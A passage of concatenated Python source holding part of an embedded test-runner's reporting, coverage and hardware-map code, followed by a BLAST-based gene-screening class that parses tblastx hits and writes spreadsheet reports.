raise SanityRuntimeError("apply_filters() hasn't been run!")
except Exception as e:
logger.error(str(e))
sys.exit(2)
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "reason"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance, reason in sorted(self.discards.items()):
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"reason": reason}
cw.writerow(rowdict)
def target_report(self, outdir, suffix, append=False):
platforms = {inst.platform.name for _, inst in self.instances.items()}
for platform in platforms:
if suffix:
filename = os.path.join(outdir,"{}_{}.xml".format(platform, suffix))
else:
filename = os.path.join(outdir,"{}.xml".format(platform))
self.xunit_report(filename, platform, full_report=True, append=append)
@staticmethod
def process_log(log_file):
filtered_string = ""
if os.path.exists(log_file):
with open(log_file, "rb") as f:
log = f.read().decode("utf-8")
filtered_string = ''.join(filter(lambda x: x in string.printable, log))
return filtered_string
def xunit_report(self, filename, platform=None, full_report=False, append=False):
total = 0
if platform:
selected = [platform]
else:
selected = self.selected_platforms
if os.path.exists(filename) and append:
tree = ET.parse(filename)
eleTestsuites = tree.getroot()
else:
eleTestsuites = ET.Element('testsuites')
for p in selected:
inst = self.get_platform_instances(p)
fails = 0
passes = 0
errors = 0
skips = 0
duration = 0
for _, instance in inst.items():
handler_time = instance.metrics.get('handler_time', 0)
duration += handler_time
if full_report:
for k in instance.results.keys():
if instance.results[k] == 'PASS':
passes += 1
elif instance.results[k] == 'BLOCK':
errors += 1
elif instance.results[k] == 'SKIP':
skips += 1
else:
fails += 1
else:
if instance.status in ["error", "failed", "timeout"]:
if instance.reason in ['build_error', 'handler_crash']:
errors += 1
else:
fails += 1
elif instance.status == 'skipped':
skips += 1
else:
passes += 1
total = (errors + passes + fails + skips)
# do not produce a report if no tests were actually run (only built)
if total == 0:
continue
run = p
eleTestsuite = None
# When we re-run the tests, we re-use the results and update only with
# the newly run tests.
if os.path.exists(filename) and append:
ts = eleTestsuites.findall(f'testsuite/[@name="{p}"]')
if ts:
eleTestsuite = ts[0]
eleTestsuite.attrib['failures'] = "%d" % fails
eleTestsuite.attrib['errors'] = "%d" % errors
eleTestsuite.attrib['skip'] = "%d" % skips
else:
logger.info(f"Did not find any existing results for {p}")
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=run, time="%f" % duration,
tests="%d" % (total),
failures="%d" % fails,
errors="%d" % (errors), skip="%s" % (skips))
else:
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=run, time="%f" % duration,
tests="%d" % (total),
failures="%d" % fails,
errors="%d" % (errors), skip="%s" % (skips))
for _, instance in inst.items():
if full_report:
tname = os.path.basename(instance.testcase.name)
else:
tname = instance.testcase.id
handler_time = instance.metrics.get('handler_time', 0)
if full_report:
for k in instance.results.keys():
# remove testcases that are being re-run from exiting reports
for tc in eleTestsuite.findall(f'testcase/[@name="{k}"]'):
eleTestsuite.remove(tc)
classname = ".".join(tname.split(".")[:2])
eleTestcase = ET.SubElement(
eleTestsuite, 'testcase',
classname=classname,
name="%s" % (k), time="%f" % handler_time)
if instance.results[k] in ['FAIL', 'BLOCK']:
if instance.results[k] == 'FAIL':
el = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message="failed")
else:
el = ET.SubElement(
eleTestcase,
'error',
type="failure",
message="failed")
p = os.path.join(self.outdir, instance.platform.name, instance.testcase.name)
log_file = os.path.join(p, "handler.log")
el.text = self.process_log(log_file)
elif instance.results[k] == 'PASS':
pass
elif instance.results[k] == 'SKIP':
el = ET.SubElement(eleTestcase, 'skipped', type="skipped", message="Skipped")
else:
el = ET.SubElement(
eleTestcase,
'error',
type="error",
message=f"{instance.reason}")
else:
if platform:
classname = ".".join(instance.testcase.name.split(".")[:2])
else:
classname = p + ":" + ".".join(instance.testcase.name.split(".")[:2])
# remove testcases that are being re-run from exiting reports
for tc in eleTestsuite.findall(f'testcase/[@classname="{classname}"]'):
eleTestsuite.remove(tc)
eleTestcase = ET.SubElement(eleTestsuite, 'testcase',
classname=classname,
name="%s" % (instance.testcase.name),
time="%f" % handler_time)
if instance.status in ["error", "failed", "timeout"]:
failure = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message=instance.reason)
p = ("%s/%s/%s" % (self.outdir, instance.platform.name, instance.testcase.name))
bl = os.path.join(p, "build.log")
hl = os.path.join(p, "handler.log")
log_file = bl
if instance.reason != 'Build error':
if os.path.exists(hl):
log_file = hl
else:
log_file = bl
failure.text = self.process_log(log_file)
elif instance.status == "skipped":
ET.SubElement(eleTestcase, 'skipped', type="skipped", message="Skipped")
result = ET.tostring(eleTestsuites)
with open(filename, 'wb') as report:
report.write(result)
def csv_report(self, filename):
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "status",
"extra_args", "handler", "handler_time", "ram_size",
"rom_size"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance in self.instances.values():
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"extra_args": " ".join(instance.testcase.extra_args),
"handler": instance.platform.simulation}
rowdict["status"] = instance.status
if instance.status not in ["error", "failed", "timeout"]:
if instance.handler:
rowdict["handler_time"] = instance.metrics.get("handler_time", 0)
ram_size = instance.metrics.get("ram_size", 0)
rom_size = instance.metrics.get("rom_size", 0)
rowdict["ram_size"] = ram_size
rowdict["rom_size"] = rom_size
cw.writerow(rowdict)
def get_testcase(self, identifier):
results = []
for _, tc in self.testcases.items():
for case in tc.cases:
if case == identifier:
results.append(tc)
return results
class CoverageTool:
""" Base class for every supported coverage tool
"""
def __init__(self):
self.gcov_tool = None
self.base_dir = None
@staticmethod
def factory(tool):
if tool == 'lcov':
t = Lcov()
elif tool == 'gcovr':
t = Lcov()
else:
logger.error("Unsupported coverage tool specified: {}".format(tool))
return None
return t
@staticmethod
def retrieve_gcov_data(intput_file):
logger.debug("Working on %s" % intput_file)
extracted_coverage_info = {}
capture_data = False
capture_complete = False
with open(intput_file, 'r') as fp:
for line in fp.readlines():
if re.search("GCOV_COVERAGE_DUMP_START", line):
capture_data = True
continue
if re.search("GCOV_COVERAGE_DUMP_END", line):
capture_complete = True
break
# Loop until the coverage data is found.
if not capture_data:
continue
if line.startswith("*"):
sp = line.split("<")
if len(sp) > 1:
# Remove the leading delimiter "*"
file_name = sp[0][1:]
# Remove the trailing new line char
hex_dump = sp[1][:-1]
else:
continue
else:
continue
extracted_coverage_info.update({file_name: hex_dump})
if not capture_data:
capture_complete = True
return {'complete': capture_complete, 'data': extracted_coverage_info}
@staticmethod
def create_gcda_files(extracted_coverage_info):
logger.debug("Generating gcda files")
for filename, hexdump_val in extracted_coverage_info.items():
# if kobject_hash is given for coverage gcovr fails
# hence skipping it problem only in gcovr v4.1
if "kobject_hash" in filename:
filename = (filename[:-4]) + "gcno"
try:
os.remove(filename)
except Exception:
pass
continue
with open(filename, 'wb') as fp:
fp.write(bytes.fromhex(hexdump_val))
def generate(self, outdir):
for filename in glob.glob("%s/**/handler.log" % outdir, recursive=True):
gcov_data = self.__class__.retrieve_gcov_data(filename)
capture_complete = gcov_data['complete']
extracted_coverage_info = gcov_data['data']
if capture_complete:
self.__class__.create_gcda_files(extracted_coverage_info)
logger.debug("Gcov data captured: {}".format(filename))
else:
logger.error("Gcov data capture incomplete: {}".format(filename))
with open(os.path.join(outdir, "coverage.log"), "a") as coveragelog:
ret = self._generate(outdir, coveragelog)
if ret == 0:
logger.info("HTML report generated: {}".format(
os.path.join(outdir, "coverage", "index.html")))
class Lcov(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('*' + pattern + '*')
def add_ignore_directory(self, pattern):
self.ignores.append(pattern + '/*')
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.info")
ztestfile = os.path.join(outdir, "ztest.info")
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool,
"--capture", "--directory", outdir,
"--rc", "lcov_branch_coverage=1",
"--output-file", coveragefile], stdout=coveragelog)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--extract",
coveragefile,
os.path.join(self.base_dir, "tests", "ztest", "*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--remove",
ztestfile,
os.path.join(self.base_dir, "tests/ztest/test/*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
for i in self.ignores:
subprocess.call(
["lcov", "--gcov-tool", self.gcov_tool, "--remove",
coveragefile, i, "--output-file",
coveragefile, "--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
# The --ignore-errors source option is added to avoid it exiting due to
# samples/application_development/external_lib/
return subprocess.call(["genhtml", "--legend", "--branch-coverage",
"--ignore-errors", "source",
"-output-directory",
os.path.join(outdir, "coverage")] + files,
stdout=coveragelog)
class Gcovr(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('.*' + pattern + '.*')
def add_ignore_directory(self, pattern):
self.ignores.append(pattern + '/.*')
@staticmethod
def _interleave_list(prefix, list):
tuple_list = [(prefix, item) for item in list]
return [item for sublist in tuple_list for item in sublist]
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.json")
ztestfile = os.path.join(outdir, "ztest.json")
excludes = Gcovr._interleave_list("-e", self.ignores)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-e", "tests/*"] + excludes +
["--json", "-o", coveragefile, outdir],
stdout=coveragelog)
subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-f", "tests/ztest", "-e",
"tests/ztest/test/*", "--json", "-o", ztestfile,
outdir], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
subdir = os.path.join(outdir, "coverage")
os.makedirs(subdir, exist_ok=True)
tracefiles = self._interleave_list("--add-tracefile", files)
return subprocess.call(["gcovr", "-r", self.base_dir, "--html",
"--html-details"] + tracefiles +
["-o", os.path.join(subdir, "index.html")],
stdout=coveragelog)
class HardwareMap:
schema_path = os.path.join(ZEPHYR_BASE, "scripts", "sanity_chk", "hwmap-schema.yaml")
manufacturer = [
'ARM',
'SEGGER',
'MBED',
'STMicroelectronics',
'Atmel Corp.',
'Texas Instruments',
'Silicon Labs',
'NXP Semiconductors',
'Microchip Technology Inc.',
'FTDI',
'Digilent'
]
runner_mapping = {
'pyocd': [
'DAPLink CMSIS-DAP',
'MBED CMSIS-DAP'
],
'jlink': [
'J-Link',
'J-Link OB'
],
'openocd': [
'STM32 STLink', '^XDS110.*', 'STLINK-V3'
],
'dediprog': [
'TTL232R-3V3',
'MCP2200 USB Serial Port Emulator'
]
}
def __init__(self):
self.detected = []
self.connected_hardware = []
def load_device_from_cmdline(self, serial, platform):
device = {
"serial": serial,
"platform": platform,
"counter": 0,
"available": True,
"connected": True
}
self.connected_hardware.append(device)
def load_hardware_map(self, map_file):
hwm_schema = scl.yaml_load(self.schema_path)
self.connected_hardware = scl.yaml_load_verify(map_file, hwm_schema)
for i in self.connected_hardware:
i['counter'] = 0
def scan_hw(self, persistent=False):
from serial.tools import list_ports
if persistent and platform.system() == 'Linux':
# On Linux, /dev/serial/by-id provides symlinks to
# '/dev/ttyACMx' nodes using names which are unique as
# long as manufacturers fill out USB metadata nicely.
#
# This creates a map from '/dev/ttyACMx' device nodes
# to '/dev/serial/by-id/usb-...' symlinks. The symlinks
# go into the hardware map because they stay the same
# even when the user unplugs / replugs the device.
#
# Some inexpensive USB/serial adapters don't result
# in unique names here, though, so use of this feature
# requires explicitly setting persistent=True.
by_id = Path('/dev/serial/by-id')
def readlink(link):
return str((by_id / link).resolve())
persistent_map = {readlink(link): str(link)
for link in by_id.iterdir()}
else:
persistent_map = {}
serial_devices = list_ports.comports()
logger.info("Scanning connected hardware...")
for d in serial_devices:
if d.manufacturer in self.manufacturer:
# TI XDS110 can have multiple serial devices for a single board
# assume endpoint 0 is the serial, skip all others
if d.manufacturer == 'Texas Instruments' and not d.location.endswith('0'):
continue
s_dev = {}
s_dev['platform'] = "unknown"
s_dev['id'] = d.serial_number
s_dev['serial'] = persistent_map.get(d.device, d.device)
s_dev['product'] = d.product
s_dev['runner'] = 'unknown'
for runner, _ in self.runner_mapping.items():
products = self.runner_mapping.get(runner)
if d.product in products:
s_dev['runner'] = runner
continue
# Try regex matching
for p in products:
if re.match(p, d.product):
s_dev['runner'] = runner
s_dev['available'] = True
s_dev['connected'] = True
self.detected.append(s_dev)
else:
logger.warning("Unsupported device (%s): %s" % (d.manufacturer, d))
def write_map(self, hwm_file):
# use existing map
if os.path.exists(hwm_file):
with open(hwm_file, 'r') as yaml_file:
hwm = yaml.load(yaml_file, Loader=SafeLoader)
hwm.sort(key=lambda x: x['serial'] or '')
# disconnect everything
for h in hwm:
h['connected'] = False
h['serial'] = None
self.detected.sort(key=lambda x: x['serial'] or '')
for d in self.detected:
for h in hwm:
if d['id'] == h['id'] and d['product'] == h['product'] and not h['connected'] and not d.get('match', False):
h['connected'] = True
h['serial'] = d['serial']
d['match'] = True
new = list(filter(lambda n: not n.get('match', False), self.detected))
hwm = hwm + new
logger.info("Registered devices:")
self.dump(hwm)
with open(hwm_file, 'w') as yaml_file:
yaml.dump(hwm, yaml_file, Dumper=Dumper, default_flow_style=False)
else:
# create new file
with open(hwm_file, 'w') as yaml_file:
yaml.dump(self.detected, yaml_file, Dumper=Dumper, default_flow_style=False)
logger.info("Detected devices:")
self.dump(self.detected)
@staticmethod
def dump(hwmap=[], filtered=[], header=[], connected_only=False):
print("")
table = []
if not header:
header = ["Platform", "ID", "Serial device"]
for p in sorted(hwmap, key=lambda i: i['platform']):
platform = p.get('platform')
connected = p.get('connected', False)
if filtered and platform not in filtered:
continue
if not connected_only or connected:
table.append([platform, p.get('id', None), p.get('serial')])
print(tabulate(table, headers=header, tablefmt="github"))
def size_report(sc):
logger.info(sc.filename)
logger.info("SECTION NAME VMA LMA SIZE HEX SZ TYPE")
for i in range(len(sc.sections)):
v = sc.sections[i]
logger.info("%-17s 0x%08x 0x%08x %8d 0x%05x %-7s" %
(v["name"], v["virt_addr"], v["load_addr"], v["size"], v["size"],
v["type"]))
logger.info("Totals: %d bytes (ROM), %d bytes (RAM)" %
(sc.rom_size, sc.ram_size))
logger.info("")
def export_tests(filename, tests):
with open(filename, "wt") as csvfile:
fieldnames = ['section', 'subsection', 'title', 'reference']
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
for test in tests:
data = test.split(".")
if len(data) > 1:
subsec = " ".join(data[1].split("_")).title()
rowdict = {
"section": data[0].capitalize(),
"subsection": subsec,
"title": test,
"reference": test
}
cw.writerow(rowdict)
else:
logger.info("{} can't be exported".format(test))
|
GeneSeekr_tblastx.py
|
#!/usr/bin/env python3
from olctools.accessoryFunctions.accessoryFunctions import printtime, run_subprocess, write_to_logfile, make_path, \
combinetargets, MetadataObject, GenObject, make_dict
from genemethods.assemblypipeline.GeneSeekr import GeneSeekr
from Bio.Blast.Applications import NcbitblastxCommandline
from Bio.Application import ApplicationError
from Bio.pairwise2 import format_alignment
from Bio.SeqRecord import SeqRecord
from Bio import pairwise2
from Bio.Seq import Seq
from Bio import SeqIO
from threading import Thread
from csv import DictReader
from glob import glob
import xlsxwriter
import time
import csv
import sys
import os
import re
__author__ = 'adamkoziol'
class GeneSeekr_tblastx(GeneSeekr):
def geneseekr(self):
# Make blast databases (if necessary)
printtime('Creating {} blast databases as required'.format(self.analysistype), self.start)
self.makedbthreads()
# Run the blast analyses
printtime('Running {} blast analyses'.format(self.analysistype), self.start)
self.blastxthreads()
if self.unique:
self.filterunique()
if self.analysistype == 'resfinder':
self.resfinderreporter()
elif self.analysistype == 'virulence':
self.virulencefinderreporter()
else:
self.reporter()
# Remove the attributes from the object; they take up too much room on the .json report
for sample in self.metadata:
delattr(sample[self.analysistype], "targetnames")
delattr(sample[self.analysistype], "targets")
printtime('{} analyses complete'.format(self.analysistype), self.start)
def blastxthreads(self):
"""Setup and create threads for blastn and xml path"""
# Create the threads for the BLAST analysis
for i in range(self.cpus):
threads = Thread(target=self.runblast, args=())
threads.setDaemon(True)
threads.start()
# Populate threads for each gene, genome combination
for sample in self.metadata:
if sample[self.analysistype].combinedtargets != 'NA':
# Add each fasta file combination to the threads
self.blastqueue.put((sample.general.bestassemblyfile, sample[self.analysistype].combinedtargets,
sample))
# Join the threads
self.blastqueue.join()
def runblast(self):
while True: # while daemon
(assembly, target, sample) = self.blastqueue.get() # grabs fastapath from dqueue
genome = os.path.splitext(os.path.split(assembly)[1])[0]
# Run the BioPython BLASTn module with the genome as query, fasta(target gene) as db.
# Do not re-perform the BLAST search each time
make_path(sample[self.analysistype].reportdir)
sample[self.analysistype].report = os.path.join(
sample[self.analysistype].reportdir, '{}.csv'.format(genome))
try:
size = os.path.getsize(sample[self.analysistype].report)
# If a report was created, but no results entered - program crashed, or no sequences passed thresholds,
# remove the report, and run the blast analyses again
if size == 0:
os.remove(sample[self.analysistype].report)
except FileNotFoundError:
pass
# Split the extension from the file path
db = os.path.splitext(target)[0]
# BLAST command line call. Note the mildly restrictive evalue, and the high number of alignments.
# Due to the fact that all the targets are combined into one database, this is to ensure that all potential
# alignments are reported. Also note the custom outfmt: the doubled quotes are necessary to get it work
blastx = NcbitblastxCommandline(query=assembly, db=db, evalue='1E-5', num_alignments=1000000,
num_threads=12,
outfmt="'6 qseqid sseqid positive mismatch gaps "
"evalue bitscore slen length qstart qend qframe qseq "
"sstart send sframe sseq'",
out=sample[self.analysistype].report)
# Save the blast command in the metadata
sample[self.analysistype].blastcommand = str(blastx)
# Only run blast if the report doesn't exist
if not os.path.isfile(sample[self.analysistype].report):
try:
blastx()
except ApplicationError:
self.blastqueue.task_done()
self.blastqueue.join()
try:
os.remove(sample[self.analysistype].report)
except (IOError, ApplicationError):
pass
raise
# Parse the output depending on whether unique results are desired
if self.unique:
self.uniqueblastparser(sample[self.analysistype].report, sample)
else:
# Run the blast parsing module
self.blastparser(sample[self.analysistype].report, sample)
self.blastqueue.task_done() # signals to dqueue job is done
def blastparser(self, report, sample):
"""
Parse the blast results, and store necessary data in dictionaries in sample object
:param report: Name of the blast output report being parsed
:param sample: sample object
"""
# Open the sequence profile file as a dictionary
blastdict = DictReader(open(report), fieldnames=self.fieldnames, dialect='excel-tab')
resultdict = dict()
# Initialise a dictionary to store all the target sequences
sample[self.analysistype].targetsequence = dict()
# Go through each BLAST result
for row in blastdict:
# Calculate the percent identity and extract the bitscore from the row
# Percent identity is the (length of the alignment - number of mismatches) / total subject length
percentidentity = float('{:0.2f}'.format((float(row['positives']) - float(row['gaps'])) /
float(row['subject_length']) * 100))
target = row['subject_id']
# If the percent identity is greater than the cutoff
if percentidentity >= self.cutoff:
# Update the dictionary with the target and percent identity
resultdict.update({target: percentidentity})
# Determine if the orientation of the sequence is reversed compared to the reference
if int(row['subject_end']) < int(row['subject_start']):
# Create a sequence object using Biopython
seq = Seq(row['query_sequence'])
# Calculate the reverse complement of the sequence
querysequence = str(seq.reverse_complement())
# If the sequence is not reversed, use the sequence as it is in the output
else:
querysequence = row['query_sequence']
# Add the sequence in the correct orientation to the sample
sample[self.analysistype].targetsequence[target] = querysequence
# Add the percent identity to the object
sample[self.analysistype].blastresults = resultdict
# Populate missing results with 'NA' values
if len(resultdict) == 0:
sample[self.analysistype].blastresults = 'NA'
def uniqueblastparser(self, report, sample):
"""
Find the best hit at a location, and discard any other matches
:param report: Name of the blast output report being parsed
:param sample: sample object
"""
# Encountering the following error: # _csv.Error: field larger than field limit (131072)
# According to https://stackoverflow.com/a/15063941, increasing the field limit should fix the issue
csv.field_size_limit(sys.maxsize)
# Open the sequence profile file as a dictionary
blastdict = DictReader(open(report), fieldnames=self.fieldnames, dialect='excel-tab')
# Initialise a dictionary to store all the target sequences
sample[self.analysistype].targetsequence = dict()
sample[self.analysistype].queryranges = dict()
sample[self.analysistype].querypercent = dict()
sample[self.analysistype].queryscore = dict()
sample[self.analysistype].results = dict()
# Go through each BLAST result
for row in blastdict:
print(row)
# Calculate the percent identity and extract the bitscore from the row
# Percent identity is the (length of the alignment - number of mismatches) / total subject length
percentidentity = float('{:0.2f}'.format((float(row['positives'])) /
float(row['subject_length']) * 100))
target = row['subject_id']
contig = row['query_id']
high = max([int(row['query_start']), int(row['query_end'])])
low = min([int(row['query_start']), int(row['query_end'])])
score = row['bit_score']
# Create new entries in the blast results dictionaries with the calculated variables
row['percentidentity'] = percentidentity
row['low'] = low
row['high'] = high
row['alignment_fraction'] = float('{:0.2f}'.format(float(float(row['alignment_length']) /
float(row['subject_length']) * 100)))
# If the percent identity is greater than the cutoff
if percentidentity >= self.cutoff:
try:
sample[self.analysistype].results[contig].append(row)
# Boolean to store whether the list needs to be updated
append = True
# Iterate through all the ranges in the list - if the new range is different than any of the ranges
# seen before, append it. Otherwise, update the previous ranges with the new, longer range as
# necessary e.g. [2494, 3296] will be updated to [2493, 3296] with [2493, 3293], and
# [2494, 3296] will become [[2493, 3296], [3296, 4132]] with [3296, 4132]
for spot in sample[self.analysistype].queryranges[contig]:
# Update the low value if the new low value is slightly lower than before
if 1 <= (spot[0] - low) <= 100:
# Update the low value
spot[0] = low
# It is not necessary to append
append = False
# Update the previous high value if the new high value is slightly higher than before
elif 1 <= (high - spot[1]) <= 100:
# Update the high value in the list
spot[1] = high
# It is not necessary to append
append = False
# Do not append if the new low is slightly larger than before
elif 1 <= (low - spot[0]) <= 100:
append = False
# Do not append if the new high is slightly smaller than before
elif 1 <= (spot[1] - high) <= 100:
append = False
# Do not append if the high and low are the same as the previously recorded values
elif low == spot[0] and high == spot[1]:
append = False
# If the result appears to be in a new location, add the data to the object
if append:
sample[self.analysistype].queryranges[contig].append([low, high])
sample[self.analysistype].querypercent[contig] = percentidentity
sample[self.analysistype].queryscore[contig] = score
# Initialise and populate the dictionary for each contig
except KeyError:
sample[self.analysistype].queryranges[contig] = list()
sample[self.analysistype].queryranges[contig].append([low, high])
sample[self.analysistype].querypercent[contig] = percentidentity
sample[self.analysistype].queryscore[contig] = score
sample[self.analysistype].results[contig] = list()
sample[self.analysistype].results[contig].append(row)
sample[self.analysistype].targetsequence[target] = dict()
# Determine if the query sequence is in a different frame than the subject, and correct
# by setting the query sequence to be the reverse complement
if int(row['subject_end']) < int(row['subject_start']):
# Create a sequence object using Biopython
seq = Seq(row['query_sequence'])
# Calculate the reverse complement of the sequence
querysequence = str(seq.reverse_complement())
# If the sequence is not reversed, use the sequence as it is in the output
else:
querysequence = row['query_sequence']
# Add the sequence in the correct orientation to the sample
sample[self.analysistype].targetsequence[target] = querysequence
def reporter(self):
"""
Creates .xlsx reports using xlsxwriter
"""
# Create a workbook to store the report. Using xlsxwriter rather than a simple csv format, as I want to be
# able to have appropriately sized, multi-line cells
workbook = xlsxwriter.Workbook(os.path.join(self.reportpath, '{}.xlsx'.format(self.analysistype)))
# New worksheet to store the data
worksheet = workbook.add_worksheet()
# Add a bold format for header cells. Using a monotype font size 10
bold = workbook.add_format({'bold': True, 'font_name': 'Courier New', 'font_size': 10})
# Format for data cells. Monotype, size 10, top vertically justified
courier = workbook.add_format({'font_name': 'Courier New', 'font_size': 10})
courier.set_align('top')
# Initialise the position within the worksheet to be (0,0)
row = 0
# A dictionary to store the column widths for every header
columnwidth = dict()
for sample in self.metadata:
# Reset the column to zero
col = 0
# Initialise a list to store all the data for each strain
data = list()
# Initialise a list of all the headers with 'Strain'
headers = ['Strain']
if sample[self.analysistype].targetnames != 'NA':
# Append the sample name to the data list only if the script could find targets
data.append(sample.name)
if sample[self.analysistype].blastresults != 'NA':
for target in sorted(sample[self.analysistype].targetnames):
# Add the name of the gene to the header
headers.append(target)
try:
# Append the percent identity to the data list
data.append(str(sample[self.analysistype].blastresults[target]))
# Only if the alignment option is selected, for inexact results, add alignments
if self.align and sample[self.analysistype].blastresults[target] != 100.00:
# Align the protein (and nucleotide) sequences to the reference
self.alignprotein(sample, target)
# Add the appropriate headers
headers.extend(['{}_aa_Identity'.format(target),
'{}_aa_Alignment'.format(target),
'{}_aa_SNP_location'.format(target),
'{}_nt_Alignment'.format(target),
'{}_nt_SNP_location'.format(target)
])
# Add the alignment, and the location of mismatches for both nucleotide and amino
# acid sequences
data.extend([sample[self.analysistype].aaidentity[target],
sample[self.analysistype].aaalign[target],
sample[self.analysistype].aaindex[target],
sample[self.analysistype].ntalign[target],
sample[self.analysistype].ntindex[target],
])
# If there are no blast results for the target, add a '-'
except (KeyError, TypeError):
data.append('-')
# If there are no blast results at all, add a '-'
else:
data.append('-')
# Write the header to the spreadsheet
for header in headers:
worksheet.write(row, col, header, bold)
# Set the column width based on the longest header
try:
columnwidth[col] = len(header)if len(header) > columnwidth[col] else columnwidth[col]
except KeyError:
columnwidth[col] = len(header)
worksheet.set_column(col, col, columnwidth[col])
col += 1
# Increment the row and reset the column to zero in preparation of writing results
row += 1
col = 0
# List of the number of lines for each result
totallines = list()
# Write out the data to the spreadsheet
for results in data:
worksheet.write(row, col, results, courier)
try:
# Counting the length of multi-line strings yields columns that are far too wide, only count
# the length of the string up to the first line break
alignmentcorrect = len(results.split('\n')[0])
# Count the number of lines for the data
lines = results.count('\n') if results.count('\n') >= 1 else 1
# Add the number of lines to the list
totallines.append(lines)
# If there are no newline characters, set the width to the length of the string
except AttributeError:
alignmentcorrect = len(results)
lines = 1
# Add the number of lines to the list
totallines.append(lines)
# Increase the width of the current column, if necessary
try:
columnwidth[col] = alignmentcorrect if alignmentcorrect > columnwidth[col] else columnwidth[col]
except KeyError:
columnwidth[col] = alignmentcorrect
worksheet.set_column(col, col, columnwidth[col])
col += 1
# Set the width of the row to be the number of lines (number of newline characters) * 12
if len(totallines) != 0:
worksheet.set_row(row, max(totallines) * 12)
else:
worksheet.set_row(row, 1)
# Increase the row counter for the next strain's data
row += 1
# Close the workbook
workbook.close()
def alignprotein(self, sample, target):
"""
Create alignments of the sample nucleotide and amino acid sequences to the reference sequences
"""
# Initialise dictionaries
sample[self.analysistype].dnaseq = dict()
sample[self.analysistype].protseq = dict()
sample[self.analysistype].ntindex = dict()
sample[self.analysistype].aaindex = dict()
sample[self.analysistype].ntalign = dict()
sample[self.analysistype].aaalign = dict()
sample[self.analysistype].aaidentity = dict()
# Remove any gaps incorporated into the sequence
sample[self.analysistype].targetsequence[target] = \
sample[self.analysistype].targetsequence[target].replace('-', '')
# In order to properly translate the nucleotide sequence, BioPython requests that the sequence is a multiple of
# three - not partial codons. Trim the sequence accordingly
remainder = 0 - len(sample[self.analysistype].targetsequence[target]) % 3
seq = sample[self.analysistype].targetsequence[target] if remainder == 0 \
else sample[self.analysistype].targetsequence[target][:remainder]
# Set the DNA and protein sequences of the target in the sample
sample[self.analysistype].dnaseq[target] = Seq(seq)
# Translate the nucleotide sequence
sample[self.analysistype].protseq[target] = str(sample[self.analysistype].dnaseq[target].translate())
for targetfile in self.targetfiles:
# Trim the reference sequence to multiples of three
refremainder = 0 - len(self.records[targetfile][target].seq) % 3
refseq = str(self.records[targetfile][target].seq) if refremainder % 3 == 0 \
else str(self.records[targetfile][target].seq)[:refremainder]
# Translate the nucleotide sequence of the reference sequence
refdna = Seq(refseq)
refprot = str(refdna.translate())
# Use pairwise2 to perform a local alignment with the following parameters:
# x No match parameters. Identical characters have score of 1, otherwise 0.
# s Same open (-1) and extend (-.1) gap penalties for both sequences
ntalignments = pairwise2.align.localxs(seq, refseq, -1, -.1)
# Use format_alignment to create a formatted alignment that is subsequently split on newlines e.g.
'''
ACCGT
| ||
A-CG-
Score=3
'''
ntformat = (str(format_alignment(*ntalignments[0])).split('\n'))
# Align the nucleotide sequence of the reference (ntalignments[2]) to the sample (ntalignments[0]).
# If the corresponding bases match, add a |, otherwise a space
ntalignment = ''.join(map(lambda x: '|' if len(set(x)) == 1 else ' ',
zip(ntformat[0], ntformat[2])))
# Create the nucleotide alignment: the sample sequence, the (mis)matches, and the reference sequence
sample[self.analysistype].ntalign[target] = self.interleaveblastresults(ntformat[0], ntformat[2])
# Regex to determine location of mismatches in the sequences
count = 0
sample[self.analysistype].ntindex[target] = str()
for snp in re.finditer(' ', ntalignment):
# If there are many SNPs, then insert line breaks for every 10 SNPs
if count <= 10:
sample[self.analysistype].ntindex[target] += str(snp.start()) + ';'
else:
sample[self.analysistype].ntindex[target] += '\n' + str(snp.start()) + ';'
count = 0
count += 1
# Perform the same steps, except for the amino acid sequence
aaalignments = pairwise2.align.localxs(sample[self.analysistype].protseq[target], refprot, -1, -.1)
aaformat = (str(format_alignment(*aaalignments[0])).split('\n'))
aaalignment = ''.join(map(lambda x: '|' if len(set(x)) == 1 else ' ',
zip(aaformat[0], aaformat[2])))
sample[self.analysistype].aaidentity[target] = '{:.2f}'\
.format(float(aaalignment.count('|')) / float(len(aaalignment)) * 100)
sample[self.analysistype].aaalign[target] = self.interleaveblastresults(aaformat[0], aaformat[2])
count = 0
sample[self.analysistype].aaindex[target] = str()
for snp in re.finditer(' ', aaalignment):
if count <= 10:
sample[self.analysistype].aaindex[target] += str(snp.start()) + ';'
else:
sample[self.analysistype].aaindex[target] += '\n' + str(snp.start()) + ';'
count = 0
count += 1
def resfinderreporter(self):
"""
